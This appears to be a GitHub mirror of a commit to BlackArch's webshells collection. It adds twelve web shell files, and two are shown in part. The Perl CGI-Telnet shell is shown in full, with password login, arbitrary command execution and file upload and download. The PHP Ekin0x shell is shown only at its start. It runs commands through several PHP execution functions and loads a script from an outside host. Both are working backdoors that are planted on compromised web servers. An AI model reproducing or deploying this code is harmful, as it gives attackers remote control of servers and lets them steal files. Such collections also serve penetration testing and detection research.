mirror of
https://github.com/BlackArch/webshells
synced 2024-11-28 14:50:41 +00:00
commit
70e33bfde3
12 changed files with 18930 additions and 0 deletions
773
php/CWShellDumper.php
Normal file
773
php/CWShellDumper.php
Normal file
File diff suppressed because one or more lines are too long
6485
php/R0XEM ShElL.php
Normal file
6485
php/R0XEM ShElL.php
Normal file
File diff suppressed because one or more lines are too long
2590
php/aspx.php
Normal file
2590
php/aspx.php
Normal file
File diff suppressed because it is too large
Load diff
690
php/cgi.php
Normal file
690
php/cgi.php
Normal file
|
@ -0,0 +1,690 @@
|
|||
#!/usr/bin/perl
|
||||
#------------------------------------------------------------------------------
|
||||
# Copyright and Licence
|
||||
#------------------------------------------------------------------------------
|
||||
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
|
||||
#
|
||||
# Copyright (C) 2001 Rohitab Batra
|
||||
# Permission is granted to use, distribute and modify this script so long
|
||||
# as this copyright notice is left intact. If you make changes to the script
|
||||
# please document them and inform me. If you would like any changes to be made
|
||||
# in this script, you can e-mail me.
|
||||
#
|
||||
# Author: Rohitab Batra
|
||||
# Author e-mail: rohitab@rohitab.com
|
||||
# Author Homepage: http://www.rohitab.com/
|
||||
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
|
||||
# Product Support: http://www.rohitab.com/support/
|
||||
# Discussion Forum: http://www.rohitab.com/discuss/
|
||||
# Mailing List: http://www.rohitab.com/mlist/
|
||||
#------------------------------------------------------------------------------
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Installation
|
||||
#------------------------------------------------------------------------------
|
||||
# To install this script
|
||||
#
|
||||
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
|
||||
# your server. For most servers, you may not need to modify this.
|
||||
# 2. Change the password in the Configuration section below.
|
||||
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
|
||||
# Configuration Section below.
|
||||
# 4. Upload the script to a directory on your server which has permissions to
|
||||
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
|
||||
# the script in ASCII mode.
|
||||
# 5. Change the permission (CHMOD) of the script to 755.
|
||||
# 6. Open the script in your web browser. If you uploaded the script in
|
||||
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
|
||||
# 7. Login using the password that you specified in Step 2.
|
||||
#------------------------------------------------------------------------------
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Configuration: You need to change only $Password and $WinNT. The other
|
||||
# values should work fine for most systems.
|
||||
#------------------------------------------------------------------------------
|
||||
$Password = "skyclad1"; # Change this. You will need to enter this
|
||||
# to login.
|
||||
|
||||
$WinNT = 0; # You need to change the value of this to 1 if
|
||||
# you're running this script on a Windows NT
|
||||
# machine. If you're running it on Unix, you
|
||||
# can leave the value as it is.
|
||||
|
||||
$NTCmdSep = "&"; # This character is used to seperate 2 commands
|
||||
# in a command line on Windows NT.
|
||||
|
||||
$UnixCmdSep = ";"; # This character is used to seperate 2 commands
|
||||
# in a command line on Unix.
|
||||
|
||||
$CommandTimeoutDuration = 10; # Time in seconds after commands will be killed
|
||||
# Don't set this to a very large value. This is
|
||||
# useful for commands that may hang or that
|
||||
# take very long to execute, like "find /".
|
||||
# This is valid only on Unix servers. It is
|
||||
# ignored on NT Servers.
|
||||
|
||||
$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
|
||||
# browser as soon as it is output, otherwise
|
||||
# it is buffered and send when the command
|
||||
# completes. This is useful for commands like
|
||||
# ping, so that you can see the output as it
|
||||
# is being generated.
|
||||
|
||||
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
|
||||
|
||||
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
|
||||
$CmdPwd = ($WinNT ? "cd" : "pwd");
|
||||
$PathSep = ($WinNT ? "\\" : "/");
|
||||
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Reads the input sent by the browser and parses the input variables. It
|
||||
# parses GET, POST and multipart/form-data that is used for uploading files.
|
||||
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
|
||||
# Other variables can be accessed using $in{'var'}, where var is the name of
|
||||
# the variable. Note: Most of the code in this function is taken from other CGI
|
||||
# scripts.
|
||||
#------------------------------------------------------------------------------
|
||||
sub ReadParse
|
||||
{
|
||||
local (*in) = @_ if @_;
|
||||
local ($i, $loc, $key, $val);
|
||||
|
||||
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
|
||||
|
||||
if($ENV{'REQUEST_METHOD'} eq "GET")
|
||||
{
|
||||
$in = $ENV{'QUERY_STRING'};
|
||||
}
|
||||
elsif($ENV{'REQUEST_METHOD'} eq "POST")
|
||||
{
|
||||
binmode(STDIN) if $MultipartFormData & $WinNT;
|
||||
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
|
||||
}
|
||||
|
||||
# handle file upload data
|
||||
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
|
||||
{
|
||||
$Boundary = '--'.$1; # please refer to RFC1867
|
||||
@list = split(/$Boundary/, $in);
|
||||
$HeaderBody = $list[1];
|
||||
$HeaderBody =~ /\r\n\r\n|\n\n/;
|
||||
$Header = $`;
|
||||
$Body = $';
|
||||
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
|
||||
$in{'filedata'} = $Body;
|
||||
$Header =~ /filename=\"(.+)\"/;
|
||||
$in{'f'} = $1;
|
||||
$in{'f'} =~ s/\"//g;
|
||||
$in{'f'} =~ s/\s//g;
|
||||
|
||||
# parse trailer
|
||||
for($i=2; $list[$i]; $i++)
|
||||
{
|
||||
$list[$i] =~ s/^.+name=$//;
|
||||
$list[$i] =~ /\"(\w+)\"/;
|
||||
$key = $1;
|
||||
$val = $';
|
||||
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
|
||||
$val =~ s/%(..)/pack("c", hex($1))/ge;
|
||||
$in{$key} = $val;
|
||||
}
|
||||
}
|
||||
else # standard post data (url encoded, not multipart)
|
||||
{
|
||||
@in = split(/&/, $in);
|
||||
foreach $i (0 .. $#in)
|
||||
{
|
||||
$in[$i] =~ s/\+/ /g;
|
||||
($key, $val) = split(/=/, $in[$i], 2);
|
||||
$key =~ s/%(..)/pack("c", hex($1))/ge;
|
||||
$val =~ s/%(..)/pack("c", hex($1))/ge;
|
||||
$in{$key} .= "\0" if (defined($in{$key}));
|
||||
$in{$key} .= $val;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML Page Header
|
||||
# Argument 1: Form item name to which focus should be set
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintPageHeader
|
||||
{
|
||||
$EncodedCurrentDir = $CurrentDir;
|
||||
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
|
||||
print "Content-type: text/html\n\n";
|
||||
print <<END;
|
||||
<html>
|
||||
<head>
|
||||
<title>CGI-Telnet Version 1.0</title>
|
||||
$HtmlMetaHeader
|
||||
</head>
|
||||
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
|
||||
<table border="1" width="100%" cellspacing="0" cellpadding="2">
|
||||
<tr>
|
||||
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
|
||||
<b><font color="#000080" size="2">#</font></b></td>
|
||||
<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
|
||||
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
|
||||
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
|
||||
<a href="$ScriptLocation?a=logout">Disconnect</a> |
|
||||
<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
|
||||
</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
<font color="#C0C0C0" size="3">
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the Login Screen
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLoginScreen
|
||||
{
|
||||
$Message = q$<pre><font color="#669999"> _____ _____ _____ _____ _ _
|
||||
/ __ \| __ \|_ _| |_ _| | | | |
|
||||
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
|
||||
| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
|
||||
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
|
||||
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 1.0
|
||||
|
||||
</font><font color="#FF0000"> ______ </font><font color="#AE8300">© 2001, Rohitab Batra</font><font color="#FF0000">
|
||||
.-" "-.
|
||||
/ \
|
||||
| |
|
||||
|, .-. .-. ,|
|
||||
| )(_o/ \o_)( |
|
||||
|/ /\ \|
|
||||
(@_ (_ ^^ _)
|
||||
_ ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
|
||||
</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080"><________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________></font><font color="#FF0000">
|
||||
)_/ \ /
|
||||
(@ `--------`
|
||||
</font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
|
||||
$;
|
||||
#'
|
||||
print <<END;
|
||||
<code>
|
||||
Trying $ServerName...<br>
|
||||
Connected to $ServerName<br>
|
||||
Escape character is ^]
|
||||
<code>$Message
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the message that informs the user of a failed login
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLoginFailedMessage
|
||||
{
|
||||
print <<END;
|
||||
<code>
|
||||
<br>login: admin<br>
|
||||
password:<br>
|
||||
Login incorrect<br><br>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form for logging in
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLoginForm
|
||||
{
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" method="POST" action="$ScriptLocation">
|
||||
<input type="hidden" name="a" value="login">
|
||||
login: admin<br>
|
||||
password:<input type="password" name="p">
|
||||
<input type="submit" value="Enter">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the footer for the HTML Page
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintPageFooter
|
||||
{
|
||||
print "</font></body></html>";
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Retreives the values of all cookies. The cookies can be accesses using the
|
||||
# variable $Cookies{''}
|
||||
#------------------------------------------------------------------------------
|
||||
sub GetCookies
|
||||
{
|
||||
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
|
||||
foreach $cookie(@httpcookies)
|
||||
{
|
||||
($id, $val) = split(/=/, $cookie);
|
||||
$Cookies{$id} = $val;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the screen when the user logs out
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLogoutScreen
|
||||
{
|
||||
print "<code>Connection closed by foreign host.<br><br></code>";
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Logs out the user and allows the user to login again
|
||||
#------------------------------------------------------------------------------
|
||||
sub PerformLogout
|
||||
{
|
||||
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
|
||||
&PrintPageHeader("p");
|
||||
&PrintLogoutScreen;
|
||||
&PrintLoginScreen;
|
||||
&PrintLoginForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called to login the user. If the password matches, it
|
||||
# displays a page that allows the user to run commands. If the password doens't
|
||||
# match or if no password is entered, it displays a form that allows the user
|
||||
# to login
|
||||
#------------------------------------------------------------------------------
|
||||
sub PerformLogin
|
||||
{
|
||||
if($LoginPassword eq $Password) # password matched
|
||||
{
|
||||
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
|
||||
&PrintPageHeader("c");
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
else # password didn't match
|
||||
{
|
||||
&PrintPageHeader("p");
|
||||
&PrintLoginScreen;
|
||||
if($LoginPassword ne "") # some password was entered
|
||||
{
|
||||
&PrintLoginFailedMessage;
|
||||
}
|
||||
&PrintLoginForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form that allows the user to enter commands
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintCommandLineInputForm
|
||||
{
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" method="POST" action="$ScriptLocation">
|
||||
<input type="hidden" name="a" value="command">
|
||||
<input type="hidden" name="d" value="$CurrentDir">
|
||||
$Prompt
|
||||
<input type="text" name="c">
|
||||
<input type="submit" value="Enter">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form that allows the user to download files
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintFileDownloadForm
|
||||
{
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" method="POST" action="$ScriptLocation">
|
||||
<input type="hidden" name="d" value="$CurrentDir">
|
||||
<input type="hidden" name="a" value="download">
|
||||
$Prompt download<br><br>
|
||||
Filename: <input type="text" name="f" size="35"><br><br>
|
||||
Download: <input type="submit" value="Begin">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form that allows the user to upload files
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintFileUploadForm
|
||||
{
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
|
||||
$Prompt upload<br><br>
|
||||
Filename: <input type="file" name="f" size="35"><br><br>
|
||||
Options: <input type="checkbox" name="o" value="overwrite">
|
||||
Overwrite if it Exists<br><br>
|
||||
Upload: <input type="submit" value="Begin">
|
||||
<input type="hidden" name="d" value="$CurrentDir">
|
||||
<input type="hidden" name="a" value="upload">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the timeout for a command expires. We need to
|
||||
# terminate the script immediately. This function is valid only on Unix. It is
|
||||
# never called when the script is running on NT.
|
||||
#------------------------------------------------------------------------------
|
||||
sub CommandTimeout
|
||||
{
|
||||
if(!$WinNT)
|
||||
{
|
||||
alarm(0);
|
||||
print <<END;
|
||||
</xmp>
|
||||
<code>
|
||||
Command exceeded maximum time of $CommandTimeoutDuration second(s).
|
||||
<br>Killed it!
|
||||
<code>
|
||||
END
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
exit;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called to execute commands. It displays the output of the
|
||||
# command and allows the user to enter another command. The change directory
|
||||
# command is handled differently. In this case, the new directory is stored in
|
||||
# an internal variable and is used each time a command has to be executed. The
|
||||
# output of the change directory command is not displayed to the users
|
||||
# therefore error messages cannot be displayed.
|
||||
#------------------------------------------------------------------------------
|
||||
sub ExecuteCommand
|
||||
{
|
||||
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
|
||||
{
|
||||
# we change the directory internally. The output of the
|
||||
# command is not displayed.
|
||||
|
||||
$OldDir = $CurrentDir;
|
||||
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
|
||||
chop($CurrentDir = `$Command`);
|
||||
&PrintPageHeader("c");
|
||||
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
|
||||
print "<code>$Prompt $RunCommand</code>";
|
||||
}
|
||||
else # some other command, display the output
|
||||
{
|
||||
&PrintPageHeader("c");
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print "<code>$Prompt $RunCommand</code><xmp>";
|
||||
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
|
||||
if(!$WinNT)
|
||||
{
|
||||
$SIG{'ALRM'} = \&CommandTimeout;
|
||||
alarm($CommandTimeoutDuration);
|
||||
}
|
||||
if($ShowDynamicOutput) # show output as it is generated
|
||||
{
|
||||
$|=1;
|
||||
$Command .= " |";
|
||||
open(CommandOutput, $Command);
|
||||
while(<CommandOutput>)
|
||||
{
|
||||
$_ =~ s/(\n|\r\n)$//;
|
||||
print "$_\n";
|
||||
}
|
||||
$|=0;
|
||||
}
|
||||
else # show output after command completes
|
||||
{
|
||||
print `$Command`;
|
||||
}
|
||||
if(!$WinNT)
|
||||
{
|
||||
alarm(0);
|
||||
}
|
||||
print "</xmp>";
|
||||
}
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function displays the page that contains a link which allows the user
|
||||
# to download the specified file. The page also contains a auto-refresh
|
||||
# feature that starts the download automatically.
|
||||
# Argument 1: Fully qualified filename of the file to be downloaded
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintDownloadLinkPage
|
||||
{
|
||||
local($FileUrl) = @_;
|
||||
if(-e $FileUrl) # if the file exists
|
||||
{
|
||||
# encode the file link so we can send it to the browser
|
||||
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
|
||||
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
|
||||
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
|
||||
&PrintPageHeader("c");
|
||||
print <<END;
|
||||
<code>
|
||||
Sending File $TransferFile...<br>
|
||||
If the download does not start automatically,
|
||||
<a href="$DownloadLink">Click Here</a>.
|
||||
</code>
|
||||
END
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
else # file doesn't exist
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
print "<code>Failed to download $FileUrl: $!</code>";
|
||||
&PrintFileDownloadForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function reads the specified file from the disk and sends it to the
|
||||
# browser, so that it can be downloaded by the user.
|
||||
# Argument 1: Fully qualified pathname of the file to be sent.
|
||||
#------------------------------------------------------------------------------
|
||||
sub SendFileToBrowser
|
||||
{
|
||||
local($SendFile) = @_;
|
||||
if(open(SENDFILE, $SendFile)) # file opened for reading
|
||||
{
|
||||
if($WinNT)
|
||||
{
|
||||
binmode(SENDFILE);
|
||||
binmode(STDOUT);
|
||||
}
|
||||
$FileSize = (stat($SendFile))[7];
|
||||
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
|
||||
print "Content-Type: application/x-unknown\n";
|
||||
print "Content-Length: $FileSize\n";
|
||||
print "Content-Disposition: attachment; filename=$1\n\n";
|
||||
print while(<SENDFILE>);
|
||||
close(SENDFILE);
|
||||
}
|
||||
else # failed to open file
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
print "<code>Failed to download $SendFile: $!</code>";
|
||||
&PrintFileDownloadForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the user downloads a file. It displays a message
|
||||
# to the user and provides a link through which the file can be downloaded.
|
||||
# This function is also called when the user clicks on that link. In this case,
|
||||
# the file is read and sent to the browser.
|
||||
#------------------------------------------------------------------------------
|
||||
sub BeginDownload
|
||||
{
|
||||
# get fully qualified path of the file to be downloaded
|
||||
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
|
||||
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
|
||||
{
|
||||
$TargetFile = $TransferFile;
|
||||
}
|
||||
else # path is relative
|
||||
{
|
||||
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
|
||||
$TargetFile .= $PathSep.$TransferFile;
|
||||
}
|
||||
|
||||
if($Options eq "go") # we have to send the file
|
||||
{
|
||||
&SendFileToBrowser($TargetFile);
|
||||
}
|
||||
else # we have to send only the link page
|
||||
{
|
||||
&PrintDownloadLinkPage($TargetFile);
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the user wants to upload a file. If the
|
||||
# file is not specified, it displays a form allowing the user to specify a
|
||||
# file, otherwise it starts the upload process.
|
||||
#------------------------------------------------------------------------------
|
||||
sub UploadFile
|
||||
{
|
||||
# if no file is specified, print the upload form again
|
||||
if($TransferFile eq "")
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
&PrintFileUploadForm;
|
||||
&PrintPageFooter;
|
||||
return;
|
||||
}
|
||||
&PrintPageHeader("c");
|
||||
|
||||
# start the uploading process
|
||||
print "<code>Uploading $TransferFile to $CurrentDir...<br>";
|
||||
|
||||
# get the fullly qualified pathname of the file to be created
|
||||
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
|
||||
$TransferFile =~ m!([^/^\\]*)$!;
|
||||
$TargetName .= $PathSep.$1;
|
||||
|
||||
$TargetFileSize = length($in{'filedata'});
|
||||
# if the file exists and we are not supposed to overwrite it
|
||||
if(-e $TargetName && $Options ne "overwrite")
|
||||
{
|
||||
print "Failed: Destination file already exists.<br>";
|
||||
}
|
||||
else # file is not present
|
||||
{
|
||||
if(open(UPLOADFILE, ">$TargetName"))
|
||||
{
|
||||
binmode(UPLOADFILE) if $WinNT;
|
||||
print UPLOADFILE $in{'filedata'};
|
||||
close(UPLOADFILE);
|
||||
print "Transfered $TargetFileSize Bytes.<br>";
|
||||
print "File Path: $TargetName<br>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Failed: $!<br>";
|
||||
}
|
||||
}
|
||||
print "</code>";
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the user wants to download a file. If the
|
||||
# filename is not specified, it displays a form allowing the user to specify a
|
||||
# file, otherwise it displays a message to the user and provides a link
|
||||
# through which the file can be downloaded.
|
||||
#------------------------------------------------------------------------------
|
||||
sub DownloadFile
|
||||
{
|
||||
# if no file is specified, print the download form again
|
||||
if($TransferFile eq "")
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
&PrintFileDownloadForm;
|
||||
&PrintPageFooter;
|
||||
return;
|
||||
}
|
||||
|
||||
# get fully qualified path of the file to be downloaded
|
||||
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
|
||||
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
|
||||
{
|
||||
$TargetFile = $TransferFile;
|
||||
}
|
||||
else # path is relative
|
||||
{
|
||||
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
|
||||
$TargetFile .= $PathSep.$TransferFile;
|
||||
}
|
||||
|
||||
if($Options eq "go") # we have to send the file
|
||||
{
|
||||
&SendFileToBrowser($TargetFile);
|
||||
}
|
||||
else # we have to send only the link page
|
||||
{
|
||||
&PrintDownloadLinkPage($TargetFile);
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Main Program - Execution Starts Here
|
||||
#------------------------------------------------------------------------------
|
||||
&ReadParse;
|
||||
&GetCookies;
|
||||
|
||||
$ScriptLocation = $ENV{'SCRIPT_NAME'};
|
||||
$ServerName = $ENV{'SERVER_NAME'};
|
||||
$LoginPassword = $in{'p'};
|
||||
$RunCommand = $in{'c'};
|
||||
$TransferFile = $in{'f'};
|
||||
$Options = $in{'o'};
|
||||
|
||||
$Action = $in{'a'};
|
||||
$Action = "login" if($Action eq ""); # no action specified, use default
|
||||
|
||||
# get the directory in which the commands will be executed
|
||||
$CurrentDir = $in{'d'};
|
||||
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
|
||||
|
||||
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
|
||||
|
||||
if($Action eq "login" || !$LoggedIn) # user needs/has to login
|
||||
{
|
||||
&PerformLogin;
|
||||
}
|
||||
elsif($Action eq "command") # user wants to run a command
|
||||
{
|
||||
&ExecuteCommand;
|
||||
}
|
||||
elsif($Action eq "upload") # user wants to upload a file
|
||||
{
|
||||
&UploadFile;
|
||||
}
|
||||
elsif($Action eq "download") # user wants to download a file
|
||||
{
|
||||
&DownloadFile;
|
||||
}
|
||||
elsif($Action eq "logout") # user wants to logout
|
||||
{
|
||||
&PerformLogout;
|
||||
}
|
1102
php/cmd.php
Normal file
1102
php/cmd.php
Normal file
File diff suppressed because it is too large
Load diff
3112
php/dq.php
Normal file
3112
php/dq.php
Normal file
File diff suppressed because it is too large
Load diff
607
php/ekin0x.php
Normal file
607
php/ekin0x.php
Normal file
|
@ -0,0 +1,607 @@
|
|||
<?
|
||||
/*###########################################
|
||||
Ekin0x Shell volume 2.1S
|
||||
|
||||
r57.biz
|
||||
###########################################*/
|
||||
|
||||
error_reporting(0);
|
||||
set_magic_quotes_runtime(0);
|
||||
|
||||
if(version_compare(phpversion(), '4.1.0') == -1)
|
||||
{$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
|
||||
$_SERVER = &$HTTP_SERVER_VARS;
|
||||
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
|
||||
if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
|
||||
elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
|
||||
else{return $requ."?".$link."=".$val;}}
|
||||
function delm($delmtxt){print"<center><table bgcolor=Black style='border:1px solidDeepSkyBlue ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
|
||||
function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
|
||||
$nscmd=htmlspecialchars($scmd);print $nscmd;}
|
||||
elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
|
||||
$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
|
||||
elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
|
||||
while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
|
||||
print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
|
||||
ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
|
||||
ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
|
||||
print htmlspecialchars($pret);}}
|
||||
function input($type,$name,$value,$size)
|
||||
{if (empty($value)){print "<input type=$type name=$name size=$size>";}
|
||||
elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
|
||||
elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
|
||||
else {print "<input type=$type name=$name value=$value size=$size >";}}
|
||||
function permcol($path){if (is_writable($path)){print "<font color=red>";
|
||||
callperms($path); print "</font>";}
|
||||
elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue >";
|
||||
callperms($path); print "</font>";}
|
||||
else {print "<font color=DeepSkyBlue >";callperms($path);}}
|
||||
if ($dlink=="dwld"){download($_REQUEST['dwld']);}
|
||||
function download($dwfile) {$size = filesize($dwfile);
|
||||
@header("Content-Type: application/force-download;name=$dwfile");
|
||||
@header("Content-Transfer-Encoding: binary");
|
||||
@header("Content-Length: $size");
|
||||
@header("Content-Disposition: attachment; filename=$dwfile");
|
||||
@header("Expires: 0");
|
||||
@header("Cache-Control: no-cache, must-revalidate");
|
||||
@header("Pragma: no-cache");
|
||||
@readfile($dwfile); exit;}
|
||||
?>
|
||||
<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
|
||||
<html>
|
||||
<head><title>Ekin0x Shell</title></head>
|
||||
<style>
|
||||
BODY { SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
|
||||
a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
|
||||
a:hover{color:red}
|
||||
input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
|
||||
